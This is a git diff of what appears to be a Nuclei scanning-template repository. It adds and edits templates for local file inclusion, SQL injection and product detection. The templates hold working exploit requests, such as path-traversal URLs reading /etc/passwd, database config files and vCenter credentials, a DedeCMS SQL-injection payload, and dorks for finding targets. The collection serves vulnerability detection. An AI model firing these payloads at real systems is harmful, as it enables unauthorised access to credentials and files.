/dev/null +++ b/poc/local_file_inclusion/laravel-filemanager-lfi-8588.yaml @@ -0,0 +1,25 @@ +id: laravel-filemanager-lfi +info: + name: UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read + author: hackerarpan + severity: high + reference: + - https://www.exploit-db.com/exploits/48166 + - https://github.com/UniSharp/laravel-filemanager + metadata: + google-dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io + shodan-query: http.html:"Laravel FileManager" + tags: lfi,unisharp,laravel,filemanager,fileupload,lfr +requests: + - method: GET + path: + - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd" + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 diff --git a/poc/local_file_inclusion/magicflow-lfi-8713.yaml b/poc/local_file_inclusion/magicflow-lfi-8713.yaml index 0a5cb75f4c..6efdbd2c3a 100644 --- a/poc/local_file_inclusion/magicflow-lfi-8713.yaml +++ b/poc/local_file_inclusion/magicflow-lfi-8713.yaml @@ -3,9 +3,14 @@ info: name: MagicFlow - Local File Inclusion author: gy741 severity: critical - description: A vulnerability in MagicFlow allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter. + description: | + MagicFlow is susceptible to local file inclusion vulnerabilities because it allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter. reference: - https://www.seebug.org/vuldb/ssvid-89258 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 tags: magicflow,lfi requests: - method: GET @@ -15,8 +20,11 @@ requests: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/05/30 diff --git a/poc/local_file_inclusion/metinfo-lfi-8839.yaml b/poc/local_file_inclusion/metinfo-lfi-8839.yaml index 63ca93ac66..4628dea9d4 100644 --- a/poc/local_file_inclusion/metinfo-lfi-8839.yaml +++ b/poc/local_file_inclusion/metinfo-lfi-8839.yaml @@ -1,26 +1,32 @@ id: metinfo-lfi + info: name: MetInfo 6.0.0/6.1.0 LFI author: pikpikcu severity: high - reference: https://paper.seebug.org/676/ description: A vulnerability in MetInfo allows remote unauthenticated attackers access to locally stored files and their content. + reference: + - https://paper.seebug.org/676/ tags: metinfo,lfi + requests: - method: GET path: - '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php' - '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php' - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php' + stop-at-first-match: true matchers-condition: and matchers: + - type: word words: - "con_db_pass" - "con_db_name" part: body condition: and + - type: status status: - 200 diff --git a/poc/local_file_inclusion/mpsec-lfi-8954.yaml b/poc/local_file_inclusion/mpsec-lfi-8954.yaml index 8848900302..1bf2038934 100644 --- a/poc/local_file_inclusion/mpsec-lfi-8954.yaml +++ b/poc/local_file_inclusion/mpsec-lfi-8954.yaml @@ -1,15 +1,19 @@ id: mpsec-lfi + info: name: MPSec ISG1000 Local File Read author: pikpikcu severity: high - reference: https://twitter.com/sec715/status/1402884871173795842 + reference: + - https://twitter.com/sec715/status/1402884871173795842 tags: mpsec,lfi + requests: - method: GET path: - "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd" - "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini" + matchers-condition: and matchers: - type: regex @@ -18,10 +22,12 @@ requests: - "root:.*:0:0:" part: body condition: or + - type: status status: - 200 + - type: word words: - "text/plain" - part: header + part: header \ No newline at end of file diff --git a/poc/local_file_inclusion/opencti-lfi-9267.yaml b/poc/local_file_inclusion/opencti-lfi-9267.yaml index 4ea676411c..a6a5a4905b 100644 --- a/poc/local_file_inclusion/opencti-lfi-9267.yaml +++ b/poc/local_file_inclusion/opencti-lfi-9267.yaml @@ -1,24 +1,31 @@ id: opencti-lfi - info: - name: OpenCTI 3.3.1 - Directory Traversal + name: OpenCTI 3.3.1 - Local File Inclusion author: 0x_Akoko severity: high - reference: https://cxsecurity.com/issue/WLB-2020060078 - tags: opencti,lfi - + description: OpenCTI 3.3.1 is vulnerable to local file inclusion. + reference: + - https://cxsecurity.com/issue/WLB-2020060078 + - https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1 + metadata: + verified: true + shodan-query: http.html:"OpenCTI" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + tags: opencti,lfi,oss requests: - method: GET path: - "{{BaseURL}}/static/css//../../../../../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 + +# Enhanced by mp on 2022/08/04 diff --git a/poc/local_file_inclusion/opensis-lfi-9317.yaml b/poc/local_file_inclusion/opensis-lfi-9317.yaml index 8037b9afd6..ac3b2ec39a 100644 --- a/poc/local_file_inclusion/opensis-lfi-9317.yaml +++ b/poc/local_file_inclusion/opensis-lfi-9317.yaml @@ -1,28 +1,28 @@ id: opensis-lfi - info: - name: openSIS 5.1 - 'ajax.php' Local File Inclusion + name: openSIS 5.1 - Local File Inclusion author: pikpikcu severity: high - description: An attacker can exploit a vulnerability in openSIS to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker - to compromise the application and computer; other attacks are also possible. + description: openSIS 5.1 is vulnerable to local file inclusion and allows attackers to obtain potentially sensitive information by executing arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible. reference: - https://www.exploit-db.com/exploits/38039 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: opensis,lfi - requests: - method: GET path: - "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php" - "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php" - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 + +# Enhanced by mp on 2022/08/04 diff --git a/poc/local_file_inclusion/oracle-fatwire-lfi-9379.yaml b/poc/local_file_inclusion/oracle-fatwire-lfi-9379.yaml index e014de6a11..6a3669ca0e 100644 --- a/poc/local_file_inclusion/oracle-fatwire-lfi-9379.yaml +++ b/poc/local_file_inclusion/oracle-fatwire-lfi-9379.yaml @@ -4,8 +4,7 @@ info: author: Bernardo Rodrigues @bernardofsr severity: critical description: Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint - reference: - - https://www.exploit-db.com/exploits/50167 + reference: https://www.exploit-db.com/exploits/50167 tags: lfi,oracle,fatwire requests: - method: GET diff --git a/poc/local_file_inclusion/phpwiki-lfi-9568.yaml b/poc/local_file_inclusion/phpwiki-lfi-9568.yaml index f9d300b410..b5d6e12ba6 100644 --- a/poc/local_file_inclusion/phpwiki-lfi-9568.yaml +++ b/poc/local_file_inclusion/phpwiki-lfi-9568.yaml @@ -3,9 +3,8 @@ info: name: phpwiki 1.5.4 - XSS / Local File Inclusion author: 0x_Akoko severity: high - description: A vulnerability in phpwiki allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. reference: https://www.exploit-db.com/exploits/38027 - tags: phpwiki,lfi,xss + tags: phpwiki,lfi requests: - method: GET path: diff --git a/poc/local_file_inclusion/shortcode-lfi-10215.yaml b/poc/local_file_inclusion/shortcode-lfi-10215.yaml index 264c220717..1bd28a766b 100644 --- a/poc/local_file_inclusion/shortcode-lfi-10215.yaml +++ b/poc/local_file_inclusion/shortcode-lfi-10215.yaml @@ -1,18 +1,15 @@ id: shortcode-lfi info: - name: WordPress Download Shortcode 0.2.3 - Local File Inclusion + name: WordPress Plugin Download Shortcode Local File Inclusion (0.2.3) author: dhiyaneshDK severity: high - description: WordPress Download Shortcode 0.2.3 is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. Prior versions may also be affected. + description: WordPress Plugin Download Shortcode is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain + sensitive information that could aid in further attacks. WordPress Plugin Download Shortcode version 0.2.3 is vulnerable; prior versions may also be affected. reference: - https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html metadata: google-dork: inurl:wp/wp-content/force-download.php - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: wordpress,wp-plugin,lfi,shortcode,wp requests: @@ -32,5 +29,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/29 diff --git a/poc/local_file_inclusion/sl-studio-lfi-10319.yaml b/poc/local_file_inclusion/sl-studio-lfi-10319.yaml index 9679b24436..15e7f3d46c 100644 --- a/poc/local_file_inclusion/sl-studio-lfi-10319.yaml +++ b/poc/local_file_inclusion/sl-studio-lfi-10319.yaml @@ -1,4 +1,5 @@ id: sl-studio-lfi + info: name: Webbdesign SL-Studio Directory Traversal author: 0x_Akoko @@ -8,15 +9,18 @@ info: metadata: google-dork: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.' tags: slstudio,lfi + requests: - method: GET path: - "{{BaseURL}}/index.php?page=../../../../../../../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 diff --git a/poc/local_file_inclusion/vmware-vcenter-lfi-11047.yaml b/poc/local_file_inclusion/vmware-vcenter-lfi-11047.yaml index fec7228ec4..53a04713d1 100644 --- a/poc/local_file_inclusion/vmware-vcenter-lfi-11047.yaml +++ b/poc/local_file_inclusion/vmware-vcenter-lfi-11047.yaml @@ -1,4 +1,5 @@ id: vmware-vcenter-lfi + info: name: VMware vCenter Unauthenticated Arbitrary File Read author: dwisiswant0 @@ -7,21 +8,25 @@ info: - https://kb.vmware.com/s/article/7960893 - https://twitter.com/ptswarm/status/1316016337550938122 tags: vmware,lfi,vcenter + requests: - raw: - | GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1 Host: {{Hostname}} + payloads: path: - - "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008) - - "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions - - "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0 + - "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008) + - "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions + - "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0 + matchers-condition: and matchers: - type: regex regex: - "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s=" + - type: status status: - 200 diff --git a/poc/local_file_inclusion/wordpress-lfi.yaml b/poc/local_file_inclusion/wordpress-lfi.yaml new file mode 100644 index 0000000000..f4bde03529 --- /dev/null +++ b/poc/local_file_inclusion/wordpress-lfi.yaml @@ -0,0 +1,25 @@ +id: wordpress-LFI + +info: + name: wordpress-LFI + author: 0x240x23elu + severity: High + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=../../../../../../../../../etc/passwd" + - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd" + - "{{BaseURL}}/wp-admin/admin.php?path=%2Fetc%2Fpasswd&bundle=twentynineteen&domain=twentynineteen&page=loco-theme&action=file-view" + - "{{BaseURL}}/wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" + - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd" + - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" + + + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + part: body \ No newline at end of file diff --git a/poc/local_file_inclusion/wordpress-wordfence-lfi-11351.yaml b/poc/local_file_inclusion/wordpress-wordfence-lfi-11351.yaml index d730bafdc6..a7d8606021 100644 --- a/poc/local_file_inclusion/wordpress-wordfence-lfi-11351.yaml +++ b/poc/local_file_inclusion/wordpress-wordfence-lfi-11351.yaml @@ -7,19 +7,15 @@ info: - https://www.exploit-db.com/exploits/48061 - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/ tags: wordpress,wp-plugin,lfi,wordfence - requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/local_file_inclusion/wp-oxygen-theme-lfi-11521.yaml b/poc/local_file_inclusion/wp-oxygen-theme-lfi-11521.yaml index d407ffa1b0..903bb5679d 100644 --- a/poc/local_file_inclusion/wp-oxygen-theme-lfi-11521.yaml +++ b/poc/local_file_inclusion/wp-oxygen-theme-lfi-11521.yaml @@ -1,10 +1,16 @@ id: wp-oxygen-theme-lfi info: - name: WordPress Oxygen-Theme Themes LFI + name: WordPress Oxygen-Theme - Local File Inclusion author: 0x_Akoko severity: high - tags: wordpress,wp-theme,lfi,wp - reference: https://cxsecurity.com/issue/WLB-2019030178 + description: WordPress Oxygen-Theme has a local file inclusion vulnerability via the 'file' parameter of 'download.php'. + reference: + - https://cxsecurity.com/issue/WLB-2019030178 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + tags: wordpress,wp-theme,lfi requests: - method: GET path: @@ -20,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/07/29 diff --git a/poc/local_file_inclusion/wp-simple-fields-lfi-11571.yaml b/poc/local_file_inclusion/wp-simple-fields-lfi-11571.yaml index e26d5566c9..ce5ae50dd1 100644 --- a/poc/local_file_inclusion/wp-simple-fields-lfi-11571.yaml +++ b/poc/local_file_inclusion/wp-simple-fields-lfi-11571.yaml @@ -4,7 +4,8 @@ info: name: WordPress Plugin Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE author: 0x240x23elu severity: high - reference: https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html + reference: + - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html tags: wordpress,wp-plugin,lfi requests: diff --git a/poc/local_file_inclusion/wp-tutor-lfi-11599.yaml b/poc/local_file_inclusion/wp-tutor-lfi-11599.yaml index 4362f3d8af..9214a5fa94 100644 --- a/poc/local_file_inclusion/wp-tutor-lfi-11599.yaml +++ b/poc/local_file_inclusion/wp-tutor-lfi-11599.yaml @@ -1,16 +1,10 @@ id: wp-tutor-lfi info: - name: WordPress tutor 1.5.3 - Local File Inclusion + name: WordPress Plugin tutor.1.5.3 - Local File Inclusion author: 0x240x23elu severity: high - description: WordPress tutor.1.5.3 is vulnerable to local file inclusion. - reference: - - https://www.exploit-db.com/exploits/48058 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + reference: https://www.exploit-db.com/exploits/48058 tags: wordpress,wp-plugin,lfi requests: @@ -22,6 +16,4 @@ requests: - type: regex regex: - "root:.*:0:0:" - part: body - -# Enhanced by mp on 2022/07/29 + part: body \ No newline at end of file diff --git a/poc/local_file_inclusion/xerox-efi-lfi-11681.yaml b/poc/local_file_inclusion/xerox-efi-lfi-11681.yaml index 59dd014c70..3bed6e8b43 100644 --- a/poc/local_file_inclusion/xerox-efi-lfi-11681.yaml +++ b/poc/local_file_inclusion/xerox-efi-lfi-11681.yaml @@ -1,23 +1,28 @@ id: xerox-efi-lfi + info: name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure author: gy741 severity: high - description: Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. + description: Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary + files on the affected system. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php - https://packetstormsecurity.com/files/145570 - https://www.exploit-db.com/exploits/43398/ tags: iot,xerox,disclosure,lfi + requests: - method: GET path: - "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/poc/local_file_inclusion/yishaadmin-lfi-11744.yaml b/poc/local_file_inclusion/yishaadmin-lfi-11744.yaml index 309317c0f8..3d516701fa 100644 --- a/poc/local_file_inclusion/yishaadmin-lfi-11744.yaml +++ b/poc/local_file_inclusion/yishaadmin-lfi-11744.yaml @@ -1,17 +1,13 @@ id: yishaadmin-lfi info: - name: yishaadmin - Local File Inclusion + name: yishaadmin path traversal author: Evan Rubinstein severity: high - description: yishaadmin is vulnerable to local file inclusion via the "/admin/File/DownloadFile" endpoint and allows files to be downloaded, read or deleted without any authentication. + description: An endpoint in yshaadmin "/admin/File/DownloadFile" was improperly secured, allowing for files to be downloaded, read or deleted without any authentication. reference: - https://huntr.dev/bounties/2acdd87a-12bd-4ce4-994b-0081eb908128/ - https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Util/YiSha.Util/FileHelper.cs#L181-L186 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: lfi,yishaadmin requests: @@ -29,5 +25,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/poc/magento/magento-detect-8706.yaml b/poc/magento/magento-detect-8706.yaml index ab9bd9e859..de461a9837 100644 --- a/poc/magento/magento-detect-8706.yaml +++ b/poc/magento/magento-detect-8706.yaml @@ -1,4 +1,5 @@ id: magento-detect + info: name: Magento Detect author: TechbrunchFR @@ -6,17 +7,17 @@ info: description: Identify Magento reference: - https://devdocs.magento.com/guides/v2.4/graphql/ - metadata: - verified: true - shodan-query: http.component:"Magento" tags: magento + requests: - method: GET path: - '{{BaseURL}}' - '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}' + # There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when # consumed by a SPA/PWA app, so we need a valid GraphQL query from Magento to check reference[1] + matchers-condition: or matchers: - type: dsl @@ -24,6 +25,7 @@ requests: - 'contains(tolower(all_headers), "x-magento")' - 'status_code == 200' condition: and + - type: dsl dsl: - 'contains(body, "graphql-authorization")' diff --git a/poc/microsoft/dedecms-carbuyaction-fileinclude-6792.yaml b/poc/microsoft/dedecms-carbuyaction-fileinclude-6792.yaml index 72d4198957..e6eaa19cd0 100644 --- a/poc/microsoft/dedecms-carbuyaction-fileinclude-6792.yaml +++ b/poc/microsoft/dedecms-carbuyaction-fileinclude-6792.yaml @@ -1,5 +1,4 @@ id: dedecms-carbuyaction-fileinclude - info: name: DedeCmsV5.6 Carbuyaction Fileinclude author: pikpikcu @@ -11,7 +10,6 @@ info: verified: true shodan-query: http.html:"power by dedecms" || title:"dedecms" tags: dedecms - requests: - method: GET path: @@ -19,16 +17,13 @@ requests: headers: Cookie: code=cod redirects: true - matchers-condition: and matchers: - - type: word words: - "Cod::respond()" part: body condition: and - - type: status status: - 200 diff --git a/poc/microsoft/dedecms-membergroup-sqli-6796.yaml b/poc/microsoft/dedecms-membergroup-sqli-6796.yaml index 603eb805a9..6ab43810d6 100644 --- a/poc/microsoft/dedecms-membergroup-sqli-6796.yaml +++ b/poc/microsoft/dedecms-membergroup-sqli-6796.yaml @@ -1,21 +1,27 @@ id: dedecms-membergroup-sqli + info: name: DedeCMS Membergroup SQLI author: pikpikcu severity: medium description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter. - reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html + reference: + - http://www.dedeyuan.com/xueyuan/wenti/1244.html tags: sqli,dedecms + requests: - method: GET path: - "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`" + matchers-condition: and matchers: + - type: word words: - "52c69e3a57331081823331c4e69d3f2e" part: body + - type: status status: - 200 diff --git a/poc/microsoft/default-microsoft-azure-page-6873.yaml b/poc/microsoft/default-microsoft-azure-page-6873.yaml index 0188209aab..543e5f393e 100644 --- a/poc/microsoft/default-microsoft-azure-page-6873.yaml +++ b/poc/microsoft/default-microsoft-azure-page-6873.yaml @@ -4,8 +4,9 @@ info: name: Microsoft Azure Default Page author: dhiyaneshDk severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22Microsoft+Azure+App+Service+-+Welcome%22 tags: tech,azure,microsoft - reference: https://www.shodan.io/search?query=http.title%3A%22Microsoft+Azure+App+Service+-+Welcome%22 requests: - method: GET diff --git a/poc/microsoft/feifeicms-lfr-7465.yaml b/poc/microsoft/feifeicms-lfr-7465.yaml index 09f6179d7d..783816ccf2 100644 --- a/poc/microsoft/feifeicms-lfr-7465.yaml +++ b/poc/microsoft/feifeicms-lfr-7465.yaml @@ -7,15 +7,18 @@ info: reference: - https://www.cnblogs.com/jinqi520/p/10202615.html - https://gitee.com/daicuo/feifeicms + requests: - method: GET path: - "{{BaseURL}}/index.php?s=Admin-Data-down&id=../../Conf/config.php" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "' - -# Enhanced by mp on 2022/07/15 diff --git a/poc/microsoft/kevinlab-bems-backdoor-8453.yaml b/poc/microsoft/kevinlab-bems-backdoor-8453.yaml index 429112871f..59c5f74a8c 100644 --- a/poc/microsoft/kevinlab-bems-backdoor-8453.yaml +++ b/poc/microsoft/kevinlab-bems-backdoor-8453.yaml @@ -4,7 +4,8 @@ info: author: gy741 severity: critical description: The BEMS solution has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php tags: kevinlab,backdoor requests: - raw: diff --git a/poc/microsoft/kiwitcms-login-8496.yaml b/poc/microsoft/kiwitcms-login-8496.yaml index b65a31ddd7..ae81534fc8 100644 --- a/poc/microsoft/kiwitcms-login-8496.yaml +++ b/poc/microsoft/kiwitcms-login-8496.yaml @@ -1,26 +1,23 @@ id: kiwitcms-login - info: name: Kiwi TCMS Login author: pdteam severity: info - reference: https://kiwitcms.org - tags: kiwitcms,panel + reference: + - https://kiwitcms.org metadata: shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337 - + tags: kiwitcms,panel requests: - method: GET path: - "{{BaseURL}}/accounts/login/" - matchers: - type: word words: - "Kiwi TCMS" - extractors: - type: regex group: 1 regex: - - "Version ([0-9.]+)" \ No newline at end of file + - "Version ([0-9.]+)" diff --git a/poc/microsoft/lotuscms-rce-8652.yaml b/poc/microsoft/lotuscms-rce-8652.yaml index e9cf4de15f..3092588555 100644 --- a/poc/microsoft/lotuscms-rce-8652.yaml +++ b/poc/microsoft/lotuscms-rce-8652.yaml @@ -4,7 +4,8 @@ info: name: LotusCMS 3.0 eval() RCE author: pikpikcu severity: critical - reference: https://github.com/Hood3dRob1n/LotusCMS-Exploit + reference: + - https://github.com/Hood3dRob1n/LotusCMS-Exploit tags: lotuscms,rce requests: diff --git a/poc/microsoft/microsoft-exchange-server-detect-8851.yaml b/poc/microsoft/microsoft-exchange-server-detect-8851.yaml index 10eacbc4b1..b89745b772 100644 --- a/poc/microsoft/microsoft-exchange-server-detect-8851.yaml +++ b/poc/microsoft/microsoft-exchange-server-detect-8851.yaml @@ -1,26 +1,31 @@ id: microsoft-exchange-server-detect + info: name: Microsoft Exchange Server Detect - author: pikpikcu,dhiyaneshDK + author: pikpikcu severity: info reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse - description: Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065, using Outlook Web App path data. - tags: microsoft,exchange,tech + description: | + Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data. + requests: - method: GET path: - "{{BaseURL}}/owa/auth/logon.aspx" - matchers-condition: or + + matchers-condition: and matchers: + - type: status + status: + - 200 + - type: regex regex: - "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)" part: all - - type: word - words: - - 'Exchange Log In' - - 'Microsoft Exchange - Outlook Web Access' + extractors: - type: kval + part: header kval: - - X_Owa_Version + - X-Owa-Version diff --git a/poc/microsoft/microsoft-teams-webhook-8856.yaml b/poc/microsoft/microsoft-teams-webhook-8856.yaml index 8e6497e83d..0c0bf6d78e 100644 --- a/poc/microsoft/microsoft-teams-webhook-8856.yaml +++ b/poc/microsoft/microsoft-teams-webhook-8856.yaml @@ -1,9 +1,11 @@ id: microsoft-teams-webhook + info: name: Microsoft Teams Webhook Disclosure author: Ice3man severity: info - tags: exposure,token + tags: exposure,token,microsoft + requests: - method: GET path: diff --git a/poc/microsoft/mstore-api-fcf575731390b94d640824227bb01949.yaml b/poc/microsoft/mstore-api-fcf575731390b94d640824227bb01949.yaml new file mode 100644 index 0000000000..7486fbc4c9 --- /dev/null +++ b/poc/microsoft/mstore-api-fcf575731390b94d640824227bb01949.yaml @@ -0,0 +1,59 @@ +id: mstore-api-fcf575731390b94d640824227bb01949 + +info: + name: > + MStore API – Create Native Android & iOS Apps On The Cloud <= 4.14.7 - Authentication Bypass + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/17d8e2e9-5e3f-433b-be1a-6ea765eba547?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/mstore-api/" + google-query: inurl:"/wp-content/plugins/mstore-api/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,mstore-api,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mstore-api" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.14.7') \ No newline at end of file diff --git a/poc/microsoft/myucms-lfr-8983.yaml b/poc/microsoft/myucms-lfr-8983.yaml index 96493a10e9..d6c0f52c71 100644 --- a/poc/microsoft/myucms-lfr-8983.yaml +++ b/poc/microsoft/myucms-lfr-8983.yaml @@ -3,8 +3,9 @@ info: name: MyuCMS Local File Read author: princechaddha severity: high + reference: + - https://blog.csdn.net/yalecaltech/article/details/104908257 tags: myucms,lfi - reference: https://blog.csdn.net/yalecaltech/article/details/104908257 requests: - method: GET path: @@ -12,4 +13,4 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/poc/microsoft/octobercms-default-login-9193.yaml b/poc/microsoft/octobercms-default-login-9193.yaml index c8f33662c7..a6822af271 100644 --- a/poc/microsoft/octobercms-default-login-9193.yaml +++ b/poc/microsoft/octobercms-default-login-9193.yaml @@ -1,12 +1,16 @@ id: octobercms-default-login info: - name: OctoberCMS Default Login + name: OctoberCMS - Default Admin Discovery author: princechaddha severity: high - description: OctoberCMS default administrator account credential. + description: OctoberCMS default admin credentials were discovered. reference: - https://github.com/octobercms/october - https://octobercms.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: http.component:"October CMS" @@ -51,3 +55,5 @@ requests: group: 1 regex: - 'meta name="csrf\-token" content="([A-Za-z0-9]+)">' + +# Enhanced by mp on 2022/07/15 diff --git a/poc/microsoft/opennms-web-console-9285.yaml 